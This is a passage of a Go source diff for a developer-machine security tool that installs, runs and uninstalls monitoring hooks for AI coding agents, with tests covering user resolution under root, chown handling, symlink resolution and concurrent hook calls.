+ if !strings.Contains(string(data), fakeBinary+" _hook claude-code") { + t.Errorf("settings missing hook command, got: %s", string(data)) + } + + out := stdout.String() + if !strings.Contains(out, "claude-code:") { + t.Errorf("stdout missing claude-code header, got: %q", out) + } + if !strings.Contains(out, "added:") { + t.Errorf("stdout missing added hooks line, got: %q", out) + } + if !strings.Contains(out, "wrote:") { + t.Errorf("stdout missing wrote line, got: %q", out) + } +} + +func TestRunInstall_InstallsBoth(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + m.SetPath("codex", "/usr/local/bin/codex") + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "", &stdout, &stderr) + if rc != 0 { + t.Fatalf("exit = %d, want 0 (stderr=%q)", rc, stderr.String()) + } + + for _, p := range []string{ + filepath.Join(home, ".claude", "settings.json"), + filepath.Join(home, ".codex", "hooks.json"), + filepath.Join(home, ".codex", "config.toml"), + } { + if _, err := os.Stat(p); err != nil { + t.Errorf("expected file written: %s (err=%v)", p, err) + } + } + + out := stdout.String() + // Per-adapter sections appear in declaration order: claude-code first. + if claudeIdx, codexIdx := strings.Index(out, "claude-code:"), strings.Index(out, "codex:"); claudeIdx == -1 || codexIdx == -1 || claudeIdx > codexIdx { + t.Errorf("expected claude-code section before codex; got: %q", out) + } +} + +func TestRunInstall_ExplicitAgentSkipsDetection(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + // PATH is empty — but --agent codex is an unconditional opt-in. 
+ m := newInstallMock(t, home) + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "codex", &stdout, &stderr) + if rc != 0 { + t.Fatalf("exit = %d, want 0 (stderr=%q)", rc, stderr.String()) + } + if _, err := os.Stat(filepath.Join(home, ".codex", "hooks.json")); err != nil { + t.Errorf("expected codex hooks.json: %v", err) + } + // Claude must NOT have been touched. + if _, err := os.Stat(filepath.Join(home, ".claude", "settings.json")); !os.IsNotExist(err) { + t.Errorf("claude settings should not exist on explicit --agent codex; err=%v", err) + } +} + +func TestRunInstall_IdempotentReinstall(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + + var out1 bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &out1, &bytes.Buffer{}); rc != 0 { + t.Fatalf("first install exit = %d", rc) + } + + settings := filepath.Join(home, ".claude", "settings.json") + first, err := os.ReadFile(settings) + if err != nil { + t.Fatal(err) + } + + var out2 bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &out2, &bytes.Buffer{}); rc != 0 { + t.Fatalf("second install exit = %d", rc) + } + + second, err := os.ReadFile(settings) + if err != nil { + t.Fatal(err) + } + // A reinstall pretty-prints into canonical formatting; what we + // care about is byte-stability across two reinstalls — that + // confirms upsertHook produced no spurious diff after settling. + if !bytes.Equal(first, second) { + t.Errorf("settings drifted between reinstalls:\n--- first ---\n%s\n--- second ---\n%s", string(first), string(second)) + } + + // Second run's stdout should report the entries as unchanged. 
+ if !strings.Contains(out2.String(), "unchanged:") { + t.Errorf("second-install stdout missing 'unchanged:' line, got: %q", out2.String()) + } +} + +// TestRunInstall_UsesTargetUserHomeNotProcessHome pins the wiring +// between ResolveTargetUser and selectAdapters: the install must +// target the resolved user's home, not the calling process's $HOME. +// Plugging the mock home into a path that os.UserHomeDir would never +// return is the cheapest way to verify which path actually got used. +func TestRunInstall_UsesTargetUserHomeNotProcessHome(t *testing.T) { + if runtime.GOOS == "windows" { + // The test home contains characters Windows accepts but the + // rest of the suite already covers Mac/Linux paths cleanly. + t.Skip("path-shape assertion is Unix-flavored") + } + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := filepath.Join(t.TempDir(), "explicit-target-home") + if err := os.MkdirAll(home, 0o755); err != nil { + t.Fatal(err) + } + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + + var stdout, stderr bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("exit = %d (stderr=%q)", rc, stderr.String()) + } + if _, err := os.Stat(filepath.Join(home, ".claude", "settings.json")); err != nil { + t.Errorf("install did not write under target-user home: %v", err) + } +} diff --git a/internal/aiagents/cli/rootuser.go b/internal/aiagents/cli/rootuser.go new file mode 100644 index 0000000..a59a425 --- /dev/null +++ b/internal/aiagents/cli/rootuser.go @@ -0,0 +1,91 @@ +package cli + +import ( + "fmt" + "io" + "os" + "os/user" + "strconv" + + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// TargetUser identifies the user whose home `hooks install` should +// target. UID/GID are split out so `ChownToTarget` doesn't have to +// re-parse them on each path. 
+type TargetUser struct { + User *user.User + UID int + GID int + HomeDir string +} + +// ResolveTargetUser determines whose home directory the install should +// modify. It's the only sanctioned way for install handlers to obtain a +// user — in particular, callers must NOT walk /etc/passwd or read +// $SUDO_USER directly. +// +// Behavior: +// - non-root caller: returns the calling user; ok=true. +// - root caller, console user resolved: returns the console user; ok=true. +// - root caller, no console user resolved: writes a one-line note to +// stderr, appends an entry to the errors log, and returns ok=false. +// The caller MUST exit 0 in this case — multi-user machines without +// an active console session aren't a hook-install error, just a +// no-op. +func ResolveTargetUser(exec executor.Executor, stderr io.Writer) (TargetUser, bool) { + u, err := exec.LoggedInUser() + if err != nil || u == nil { + if exec.IsRoot() { + noConsoleUser(stderr, fmt.Sprintf("LoggedInUser returned err=%v", err)) + } + return TargetUser{}, false + } + + // Under root, executor.LoggedInUser falls back to the current user + // (root) when it can't resolve the console user. Treat root-as-target + // as "no console user found" — installing hooks into root's home + // would write into a profile no human uses interactively. + if exec.IsRoot() && (u.Username == "" || u.Username == "root") { + noConsoleUser(stderr, "executor.LoggedInUser returned root under root caller") + return TargetUser{}, false + } + + uid, _ := strconv.Atoi(u.Uid) + gid, _ := strconv.Atoi(u.Gid) + return TargetUser{ + User: u, + UID: uid, + GID: gid, + HomeDir: u.HomeDir, + }, true +} + +func noConsoleUser(stderr io.Writer, detail string) { + const note = "stepsecurity-dev-machine-guard: running as root with no console user; nothing to install." + fmt.Fprintln(stderr, note) + AppendError("install", "no_console_user", detail, "") +} + +// ChownToTarget chowns each path to the target user's UID/GID. 
It's a
+// best-effort helper: any individual chown failure is logged to the
+// errors file and the loop continues — an unchown'd file is still a
+// working install, just one the target user can't tidy up themselves.
+//
+// No-op when the caller is not root (chown to a different UID requires
+// CAP_CHOWN). On Windows os.Chown is unsupported, so each call fails
+// and is logged like any other chown error. Empty paths are skipped
+// silently so callers can pass `WriteResult.BackupPath` unconditionally.
+func ChownToTarget(exec executor.Executor, paths []string, target TargetUser) {
+	if !exec.IsRoot() {
+		return
+	}
+	for _, p := range paths {
+		if p == "" {
+			continue
+		}
+		if err := os.Chown(p, target.UID, target.GID); err != nil {
+			AppendError("install", "chown_failed", fmt.Sprintf("chown %s to %d:%d: %v", p, target.UID, target.GID, err), "")
+		}
+	}
+}
diff --git a/internal/aiagents/cli/rootuser_test.go b/internal/aiagents/cli/rootuser_test.go
new file mode 100644
index 0000000..d181db2
--- /dev/null
+++ b/internal/aiagents/cli/rootuser_test.go
@@ -0,0 +1,243 @@
+package cli
+
+import (
+	"bytes"
+	"encoding/json"
+	"os"
+	"os/user"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/step-security/dev-machine-guard/internal/executor"
+)
+
+// withMockUser sets the Mock executor's CurrentUser/LoggedInUser pair.
+// Mock returns CurrentUser from LoggedInUser, so a single setter chain
+// covers both.
+//
+// Note: Mock's CurrentUser only carries Username + HomeDir — UID/GID are
+// not part of the public Mock API, so ResolveTargetUser's strconv.Atoi
+// will yield 0 on the empty string. Tests that need a specific UID
+// drive the chown branch directly with TargetUser literals (see
+// TestChownToTarget_AsFakeRootSucceedsForOwnUID).
+func withMockUser(m *executor.Mock, username, home string) { + m.SetUsername(username) + m.SetHomeDir(home) +} + +func TestResolveTargetUser_NonRoot_ReturnsCallingUser(t *testing.T) { + m := executor.NewMock() + m.SetIsRoot(false) + withMockUser(m, "alice", "/Users/alice") + + var stderr bytes.Buffer + got, ok := ResolveTargetUser(m, &stderr) + if !ok { + t.Fatal("expected ok=true for non-root caller") + } + if got.User.Username != "alice" { + t.Errorf("Username = %q, want alice", got.User.Username) + } + if got.HomeDir != "/Users/alice" { + t.Errorf("HomeDir = %q, want /Users/alice", got.HomeDir) + } + if stderr.Len() != 0 { + t.Errorf("expected silent stderr on success, got %q", stderr.String()) + } +} + +func TestResolveTargetUser_RootWithConsoleUser_ReturnsConsoleUser(t *testing.T) { + tmp := withErrorLog(t) + + m := executor.NewMock() + m.SetIsRoot(true) + withMockUser(m, "alice", "/Users/alice") + + var stderr bytes.Buffer + got, ok := ResolveTargetUser(m, &stderr) + if !ok { + t.Fatal("expected ok=true when console user resolves to non-root") + } + if got.User.Username != "alice" { + t.Errorf("Username = %q, want alice", got.User.Username) + } + + // Errors log must not be touched on the success path. + if _, err := os.Stat(tmp); !os.IsNotExist(err) { + t.Errorf("expected errors log not created on success, got err=%v", err) + } + if stderr.Len() != 0 { + t.Errorf("expected silent stderr on success, got %q", stderr.String()) + } +} + +func TestResolveTargetUser_RootNoConsoleUser_BailsWithLog(t *testing.T) { + logPath := withErrorLog(t) + + m := executor.NewMock() + m.SetIsRoot(true) + // Mock.LoggedInUser falls back to CurrentUser which returns whatever + // SetUsername staged. "root" simulates the executor failing to + // resolve a console user under root. 
+ withMockUser(m, "root", "/var/root") + + var stderr bytes.Buffer + _, ok := ResolveTargetUser(m, &stderr) + if ok { + t.Fatal("expected ok=false when running as root with no console user") + } + + if !strings.Contains(stderr.String(), "running as root with no console user") { + t.Errorf("stderr missing the expected one-line note: %q", stderr.String()) + } + + data, err := os.ReadFile(logPath) + if err != nil { + t.Fatalf("expected errors log written: %v", err) + } + var entry ErrorEntry + if err := json.Unmarshal(bytes.TrimRight(data, "\n"), &entry); err != nil { + t.Fatalf("unmarshal: %v (data=%q)", err, string(data)) + } + if entry.Stage != "install" || entry.Code != "no_console_user" { + t.Errorf("unexpected error entry: %+v", entry) + } +} + +func TestResolveTargetUser_RootEmptyUsername_AlsoBails(t *testing.T) { + withErrorLog(t) // capture log writes to temp + + m := executor.NewMock() + m.SetIsRoot(true) + withMockUser(m, "", "") + + var stderr bytes.Buffer + _, ok := ResolveTargetUser(m, &stderr) + if ok { + t.Fatal("expected ok=false for empty username under root") + } + if !strings.Contains(stderr.String(), "no console user") { + t.Errorf("stderr missing the bail note: %q", stderr.String()) + } +} + +// ChownToTarget is a no-op when the caller is not root, because chowning +// a file to a different UID requires CAP_CHOWN. Verify the early exit. +func TestChownToTarget_NoOpWhenNotRoot(t *testing.T) { + withErrorLog(t) + + dir := t.TempDir() + path := filepath.Join(dir, "f") + if err := os.WriteFile(path, []byte("x"), 0o644); err != nil { + t.Fatal(err) + } + + m := executor.NewMock() + m.SetIsRoot(false) + + // Use a bogus UID/GID — if we accidentally tried to chown, this would fail. + ChownToTarget(m, []string{path}, TargetUser{UID: 9999, GID: 9999}) + + // File still exists and is readable. 
+ if _, err := os.Stat(path); err != nil { + t.Errorf("file vanished after no-op chown: %v", err) + } +} + +func TestChownToTarget_SkipsEmptyPaths(t *testing.T) { + withErrorLog(t) + + m := executor.NewMock() + m.SetIsRoot(false) // no-op anyway, but proves the empty-string skip doesn't error + + ChownToTarget(m, []string{"", "", ""}, TargetUser{}) + // Reaching this line without a panic is the assertion. +} + +// On Unix as a non-root user, chowning a file to YOUR OWN UID is a no-op +// that succeeds. Use a "fake-root" mock that claims IsRoot=true to drive +// the chown branch, with the calling user's real UID/GID as the target — +// that's the only chown that won't fail under a non-privileged test. +func TestChownToTarget_AsFakeRootSucceedsForOwnUID(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("chown semantics differ on Windows") + } + + dir := t.TempDir() + path := filepath.Join(dir, "f") + if err := os.WriteFile(path, []byte("x"), 0o644); err != nil { + t.Fatal(err) + } + + me, err := user.Current() + if err != nil { + t.Fatal(err) + } + uid := atoi(me.Uid) + gid := atoi(me.Gid) + + withErrorLog(t) + + m := executor.NewMock() + m.SetIsRoot(true) // drive the chown branch + + ChownToTarget(m, []string{path}, TargetUser{UID: uid, GID: gid}) + + // File should still exist with the same owner. + if _, err := os.Stat(path); err != nil { + t.Errorf("file unexpectedly missing: %v", err) + } +} + +// Failed chowns (e.g., bogus UID) must be logged but not abort the loop. 
+func TestChownToTarget_FailureLogsButContinues(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("chown semantics differ on Windows")
+	}
+	if os.Getuid() == 0 {
+		t.Skip("running as actual root; chown to UID 1 would succeed and not exercise the error branch")
+	}
+
+	logPath := withErrorLog(t)
+
+	dir := t.TempDir()
+	a := filepath.Join(dir, "a")
+	b := filepath.Join(dir, "b")
+	for _, p := range []string{a, b} {
+		if err := os.WriteFile(p, []byte("x"), 0o644); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	m := executor.NewMock()
+	m.SetIsRoot(true)
+
+	// Bogus UID — chown fails for non-privileged caller despite IsRoot=true.
+	ChownToTarget(m, []string{a, b}, TargetUser{UID: 1, GID: 1})
+
+	data, err := os.ReadFile(logPath)
+	if err != nil {
+		t.Fatalf("expected errors log to capture failures: %v", err)
+	}
+	// Two failed chowns → exactly two log lines.
+	if got := len(strings.Split(strings.TrimRight(string(data), "\n"), "\n")); got != 2 {
+		// Split after trimming the trailing newline yields one element per line.
+		t.Errorf("expected 2 log entries, got %d: data=%q", got, string(data))
+	}
+	if !strings.Contains(string(data), "chown_failed") {
+		t.Errorf("expected chown_failed code in log, got %q", string(data))
+	}
+}
+
+// atoi is a digits-only parser: any non-digit rune yields 0. Sufficient
+// for the numeric UID/GID strings user.Current returns on Unix.
+func atoi(s string) int {
+	n := 0
+	for _, c := range s {
+		if c < '0' || c > '9' {
+			return 0
+		}
+		n = n*10 + int(c-'0')
+	}
+	return n
+}
diff --git a/internal/aiagents/cli/selfpath.go b/internal/aiagents/cli/selfpath.go
new file mode 100644
index 0000000..f7c1472
--- /dev/null
+++ b/internal/aiagents/cli/selfpath.go
@@ -0,0 +1,45 @@
+package cli
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+)
+
+// Resolve returns the absolute, fully symlink-resolved path of the
+// running DMG binary. The result is what `hooks install` writes into
+// agent settings as the hook command prefix.
+// +// Symlinks are evaluated so the recorded path is canonical — Homebrew, +// for example, installs binaries under `/opt/homebrew/Cellar/...` and +// links `/opt/homebrew/bin/` to them. Recording the Cellar path +// means a `brew upgrade` that swaps the symlink target still leaves a +// valid hook command (until the Cellar path itself is removed). +// +// On Windows, EvalSymlinks resolves directory junctions and reparse +// points the same way it resolves Unix symlinks. +func Resolve() (string, error) { + raw, err := os.Executable() + if err != nil { + return "", fmt.Errorf("selfpath: os.Executable: %w", err) + } + return resolveFrom(raw) +} + +// resolveFrom is the testable core of Resolve. It expects an absolute or +// relative path and returns the absolute, symlink-resolved canonical form. +// +// If symlink evaluation fails (broken link, permissions), the call fails +// rather than falling back to the unresolved path — recording an +// unresolved path defeats the canonicalization the install relies on. 
+func resolveFrom(path string) (string, error) { + resolved, err := filepath.EvalSymlinks(path) + if err != nil { + return "", fmt.Errorf("selfpath: EvalSymlinks(%s): %w", path, err) + } + abs, err := filepath.Abs(resolved) + if err != nil { + return "", fmt.Errorf("selfpath: Abs(%s): %w", resolved, err) + } + return abs, nil +} diff --git a/internal/aiagents/cli/selfpath_test.go b/internal/aiagents/cli/selfpath_test.go new file mode 100644 index 0000000..d0e6ea9 --- /dev/null +++ b/internal/aiagents/cli/selfpath_test.go @@ -0,0 +1,117 @@ +package cli + +import ( + "os" + "path/filepath" + "runtime" + "testing" +) + +func TestResolve_ReturnsAbsoluteExistingPath(t *testing.T) { + got, err := Resolve() + if err != nil { + t.Fatalf("Resolve: %v", err) + } + if !filepath.IsAbs(got) { + t.Errorf("Resolve returned non-absolute path: %q", got) + } + if _, err := os.Stat(got); err != nil { + t.Errorf("Resolve returned non-existent path %q: %v", got, err) + } +} + +func TestResolveFrom_PassesNonSymlinkThrough(t *testing.T) { + dir := t.TempDir() + real := filepath.Join(dir, "binary") + if err := os.WriteFile(real, []byte("x"), 0o755); err != nil { + t.Fatal(err) + } + got, err := resolveFrom(real) + if err != nil { + t.Fatal(err) + } + // EvalSymlinks may canonicalize the temp dir prefix (e.g., /var → /private/var on macOS). + // Compare the canonicalized expectation, not the raw input. + want, _ := filepath.EvalSymlinks(real) + if got != want { + t.Errorf("resolveFrom non-symlink: got %q, want %q", got, want) + } +} + +// Mirrors the brew-style layout: a `bin/` symlink points at the actual +// binary in `Cellar/`. Resolve must record the Cellar path so the hook +// command survives a `brew upgrade` that re-points the symlink. 
+func TestResolveFrom_FollowsSymlinkToTarget(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("symlink creation requires elevated privileges on Windows") + } + + dir := t.TempDir() + cellar := filepath.Join(dir, "Cellar", "stepsecurity-dev-machine-guard", "1.11.0") + if err := os.MkdirAll(cellar, 0o755); err != nil { + t.Fatal(err) + } + real := filepath.Join(cellar, "stepsecurity-dev-machine-guard") + if err := os.WriteFile(real, []byte("x"), 0o755); err != nil { + t.Fatal(err) + } + + binDir := filepath.Join(dir, "bin") + if err := os.MkdirAll(binDir, 0o755); err != nil { + t.Fatal(err) + } + link := filepath.Join(binDir, "stepsecurity-dev-machine-guard") + if err := os.Symlink(real, link); err != nil { + t.Fatal(err) + } + + got, err := resolveFrom(link) + if err != nil { + t.Fatal(err) + } + want, _ := filepath.EvalSymlinks(real) + if got != want { + t.Errorf("resolveFrom symlink: got %q, want %q", got, want) + } +} + +func TestResolveFrom_BrokenSymlinkErrors(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("symlink creation requires elevated privileges on Windows") + } + + dir := t.TempDir() + link := filepath.Join(dir, "broken") + if err := os.Symlink(filepath.Join(dir, "nope"), link); err != nil { + t.Fatal(err) + } + if _, err := resolveFrom(link); err == nil { + t.Error("expected error on broken symlink — recording an unresolved path defeats the canonicalization") + } +} + +func TestResolveFrom_NonExistentPathErrors(t *testing.T) { + dir := t.TempDir() + if _, err := resolveFrom(filepath.Join(dir, "does-not-exist")); err == nil { + t.Error("expected error on non-existent path") + } +} + +// On Windows the resolved binary path keeps its `.exe` suffix; the hook +// command we write into agent settings must invoke `dmg.exe`, not `dmg`. +// On Unix the suffix is just an opaque part of the basename, so the same +// expectation holds. 
+func TestResolveFrom_PreservesExeSuffix(t *testing.T) { + dir := t.TempDir() + real := filepath.Join(dir, "stepsecurity-dev-machine-guard.exe") + if err := os.WriteFile(real, []byte("x"), 0o755); err != nil { + t.Fatal(err) + } + got, err := resolveFrom(real) + if err != nil { + t.Fatal(err) + } + if filepath.Ext(got) != ".exe" { + t.Errorf("resolveFrom dropped .exe suffix: got %q", got) + } +} diff --git a/internal/aiagents/cli/smoke_test.go b/internal/aiagents/cli/smoke_test.go new file mode 100644 index 0000000..b00fc00 --- /dev/null +++ b/internal/aiagents/cli/smoke_test.go @@ -0,0 +1,91 @@ +package cli + +import ( + "bytes" + "context" + "encoding/json" + "os" + "path/filepath" + "strings" + "testing" +) + +// TestSmoke_InstallInvokeUninstall is the end-to-end smoke test: +// drives RunInstall → RunHook → RunUninstall against a single temp HOME +// and confirms the on-disk lifecycle matches what we tell users to expect. +// +// Why this is a separate test from the per-handler unit tests: +// - install/uninstall unit tests use the executor mock's HomeDir, but +// RunHook resolves home from os.UserHomeDir(); the install path the +// hook will be invoked from must match the executor's HomeDir for +// the round-trip to be meaningful. +// - the seam-stubbed hook tests prove the runtime emits a well-formed +// allow response, but they don't prove that the very settings file +// RunInstall just wrote is the one the agent would invoke against. +func TestSmoke_InstallInvokeUninstall(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + withStubUploader(t) + + home := t.TempDir() + // RunHook reads HOME via os.UserHomeDir; align it with the executor's + // HomeDir so install writes and hook resolves to the same tree. + // os.UserHomeDir checks $HOME on Unix and $USERPROFILE on Windows — + // set both so the smoke test is platform-agnostic. 
+ t.Setenv("HOME", home) + t.Setenv("USERPROFILE", home) + + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + + var instOut, instErr bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &instOut, &instErr); rc != 0 { + t.Fatalf("install: rc=%d stderr=%q", rc, instErr.String()) + } + + settings := filepath.Join(home, ".claude", "settings.json") + postInstall, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("install did not produce settings: %v", err) + } + if !strings.Contains(string(postInstall), fakeBinary+" _hook claude-code") { + t.Fatalf("settings missing hook command after install: %s", postInstall) + } + + var hookOut, hookErr bytes.Buffer + rc := RunHook( + strings.NewReader(`{"tool_name":"Bash","tool_input":{"command":"ls"}}`), + &hookOut, &hookErr, + []string{"claude-code", "PreToolUse"}, + ) + if rc != 0 { + t.Fatalf("hook: rc=%d stderr=%q", rc, hookErr.String()) + } + if hookErr.Len() != 0 { + t.Fatalf("hook stderr non-empty: %q", hookErr.String()) + } + var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(hookOut.Bytes()), &resp); err != nil { + t.Fatalf("hook stdout not valid JSON: %v: %q", err, hookOut.Bytes()) + } + if resp["continue"] != true { + t.Fatalf("hook allow response missing continue=true: %v", resp) + } + + var unOut, unErr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &unOut, &unErr); rc != 0 { + t.Fatalf("uninstall: rc=%d stderr=%q", rc, unErr.String()) + } + + postUninstall, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("uninstall removed the settings file (it should only edit it): %v", err) + } + if strings.Contains(string(postUninstall), fakeBinary+" _hook claude-code") { + t.Fatalf("uninstall left DMG-owned hook in settings: %s", postUninstall) + } + if !strings.Contains(unOut.String(), "removed:") { + t.Errorf("uninstall summary missing removed line, got: %q", unOut.String()) + } +} diff --git a/internal/aiagents/cli/stress_test.go 
b/internal/aiagents/cli/stress_test.go new file mode 100644 index 0000000..a108a55 --- /dev/null +++ b/internal/aiagents/cli/stress_test.go @@ -0,0 +1,132 @@ +package cli + +import ( + "bytes" + "encoding/json" + "os" + "strings" + "sync" + "sync/atomic" + "testing" + + aieventc "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +// TestStress_ConcurrentHookInvocations is a best-effort stress test: +// many independent RunHook callers sharing a single HOME (settings +// file, errors.jsonl, uploader seam) must each return exit 0 with a +// valid allow body. We do NOT check throughput — the purpose is to +// flush out data races, panics that survive the recover, or stdout +// corruption from interleaved writes. +// +// Marked perf-sensitive (skipped under -short): in-process N=64 routinely +// finishes in well under a second, but some CI runners stutter on the +// concurrent map/redact paths and we don't want to flake the basic +// `go test -short ./...` invocation. +func TestStress_ConcurrentHookInvocations(t *testing.T) { + if testing.Short() { + t.Skip("perf-sensitive; skipped under -short") + } + + withErrorLog(t) + home := t.TempDir() + // Same HOME-vs-USERPROFILE caveat as the smoke test: os.UserHomeDir + // reads different env vars by platform. Set both so this stress + // runs identically on Unix and Windows CI. + t.Setenv("HOME", home) + t.Setenv("USERPROFILE", home) + + // Stand up a thread-safe upload counter via the same factory the + // real wiring uses. withStubUploader installs a single capture + // closure (mutex-guarded) and the runtime reuses it across every + // concurrent call — so the test exercises the actual seam contract. 
+ captured := withStubUploader(t) + + const N = 64 + const payload = `{"tool_name":"Bash","tool_input":{"command":"ls"}}` + + var wg sync.WaitGroup + var nonZeroExits, badJSON, missingContinue atomic.Int32 + wg.Add(N) + for range N { + go func() { + defer wg.Done() + var stdout, stderr bytes.Buffer + rc := RunHook(strings.NewReader(payload), &stdout, &stderr, + []string{"claude-code", "PreToolUse"}) + if rc != 0 { + nonZeroExits.Add(1) + return + } + var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil { + badJSON.Add(1) + return + } + if resp["continue"] != true { + missingContinue.Add(1) + } + }() + } + wg.Wait() + + if got := nonZeroExits.Load(); got != 0 { + t.Errorf("non-zero exits: %d/%d (fail-open contract violated under load)", got, N) + } + if got := badJSON.Load(); got != 0 { + t.Errorf("malformed stdout JSON: %d/%d (interleaved writes?)", got, N) + } + if got := missingContinue.Load(); got != 0 { + t.Errorf("missing continue=true: %d/%d", got, N) + } + // One uploaded event per invocation; if any goroutine swallowed its + // upload silently the count diverges and we miss telemetry under + // load — exactly the regression this test exists to catch. + if got := len(*captured); got != N { + t.Errorf("uploader seam called %d times, want %d", got, N) + } + // Spot-check the captured events for the expected shape — a + // data-race that scrambled fields would show up here even when the + // count matched. + for _, ev := range *captured { + if ev.HookEvent != aieventc.HookPreToolUse { + t.Errorf("captured event hook=%q, want PreToolUse", ev.HookEvent) + break + } + } + + // Independently of upload, the runtime hits errors.jsonl any time + // identity probing or enrichment fails on the hot path. 
We don't + // require the file to exist (the happy path produces no errors) + // but if it does, every line must be a complete JSON record — a + // truncated or interleaved line proves the unlocked O_APPEND + // contract from §1.16 broke under N=64. + assertErrorLogIsClean(t) +} + +func assertErrorLogIsClean(t *testing.T) { + t.Helper() + path := errorLogPath() + if path == "" { + return + } + data, err := os.ReadFile(path) + if err != nil { + // Happy-path stress runs produce no error log — that's expected + // and not interesting. Any other read error (perms, IO) is a + // real test setup problem and should fail loudly. + if os.IsNotExist(err) { + return + } + t.Fatalf("errors log read failed: %v", err) + } + if len(data) == 0 { + return + } + for i, line := range bytes.Split(bytes.TrimRight(data, "\n"), []byte("\n")) { + var rec map[string]any + if err := json.Unmarshal(line, &rec); err != nil { + t.Errorf("errors.jsonl line %d not valid JSON (interleaved append?): %q", i, line) + } + } +} diff --git a/internal/aiagents/cli/uninstall.go b/internal/aiagents/cli/uninstall.go new file mode 100644 index 0000000..1a10377 --- /dev/null +++ b/internal/aiagents/cli/uninstall.go @@ -0,0 +1,117 @@ +package cli + +import ( + "context" + "fmt" + "io" + "strings" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// RunUninstall is the entry point for `hooks uninstall`. +// +// agent is the --agent flag value; "" means "every detected agent". +// stdout/stderr are wired from os.Stdout/os.Stderr by main. +// +// Returns the desired process exit code: +// - 0 on success, no-op (no DMG-owned entries found), no agents +// detected, or the root-with-no-console-user no-op. +// - 1 on self-path resolution failure, unsupported --agent, or any +// adapter Uninstall error. +// +// Flow: +// 1. resolve target user (root + no console user → log + exit 0) +// 2. 
resolve absolute, symlink-resolved DMG binary path (the +// uninstall matcher needs it to identify DMG-owned entries) +// 3. select adapters per --agent or detection on $PATH +// 4. per-adapter Uninstall, then chown rewritten outputs to target +// user under root +// 5. emit per-adapter summary to stdout +// +// No enterprise-config gate: uninstall must work even after the +// customer has revoked credentials or rotated keys — otherwise we'd +// trap users with hook entries pointing at a binary that can no +// longer authenticate. +// +// Adapter Uninstall errors don't abort the loop — the remaining +// adapters still get a chance. The aggregate exit code is 1 if any +// adapter failed. +func RunUninstall(ctx context.Context, exec executor.Executor, agent string, stdout, stderr io.Writer) int { + target, ok := ResolveTargetUser(exec, stderr) + if !ok { + return 0 + } + + binaryPath, err := resolveBinary() + if err != nil { + fmt.Fprintf(stderr, "stepsecurity-dev-machine-guard: cannot resolve own binary path: %v\n", err) + AppendError("uninstall", "selfpath_failed", err.Error(), "") + return 1 + } + + adapters, err := selectAdapters(ctx, agent, target.HomeDir, binaryPath, exec) + if err != nil { + fmt.Fprintf(stderr, "stepsecurity-dev-machine-guard: %v\n", err) + AppendError("uninstall", "select_adapters_failed", err.Error(), "") + return 1 + } + if len(adapters) == 0 { + fmt.Fprintln(stdout, "No supported AI coding agents detected on $PATH.") + fmt.Fprintf(stdout, "Pass --agent to uninstall for a specific agent (supported: %s).\n", + strings.Join(SupportedAgents, ", ")) + return 0 + } + + exit := 0 + for _, a := range adapters { + res, err := a.Uninstall(ctx) + if err != nil { + fmt.Fprintf(stderr, "%s: uninstall failed: %v\n", a.Name(), err) + AppendError("uninstall", "adapter_uninstall_failed", + fmt.Sprintf("%s: %v", a.Name(), err), "") + exit = 1 + continue + } + // Same chown rationale as install: a sudo-driven rewrite + // must not leave the user's settings 
owned by root. + // UninstallResult never carries CreatedDirs — uninstall only + // rewrites files that already existed. + ChownToTarget(exec, uninstallChownPaths(res), target) + printUninstallResult(stdout, a.Name(), res) + } + return exit +} + +// uninstallChownPaths is the chown sweep set for a single adapter's +// UninstallResult. WrittenFiles ∪ BackupFiles only — see RunUninstall +// for why no CreatedDirs. +func uninstallChownPaths(r adapter.UninstallResult) []string { + out := make([]string, 0, len(r.WrittenFiles)+len(r.BackupFiles)) + out = append(out, r.WrittenFiles...) + out = append(out, r.BackupFiles...) + return out +} + +// printUninstallResult renders one adapter's UninstallResult. +// +// On the "nothing to remove" path the adapter populates Notes only +// (no WrittenFiles, no HooksRemoved); the user still gets a header +// line so multi-adapter summaries don't render as a single empty +// section followed by the next adapter's output. +func printUninstallResult(w io.Writer, name string, r adapter.UninstallResult) { + fmt.Fprintf(w, "%s:\n", name) + if len(r.HooksRemoved) > 0 { + fmt.Fprintf(w, " removed: %v\n", r.HooksRemoved) + } + for _, f := range r.WrittenFiles { + fmt.Fprintf(w, " wrote: %s\n", f) + } + for _, f := range r.BackupFiles { + fmt.Fprintf(w, " backup: %s\n", f) + } + for _, n := range r.Notes { + fmt.Fprintf(w, " note: %s\n", n) + } +} diff --git a/internal/aiagents/cli/uninstall_test.go 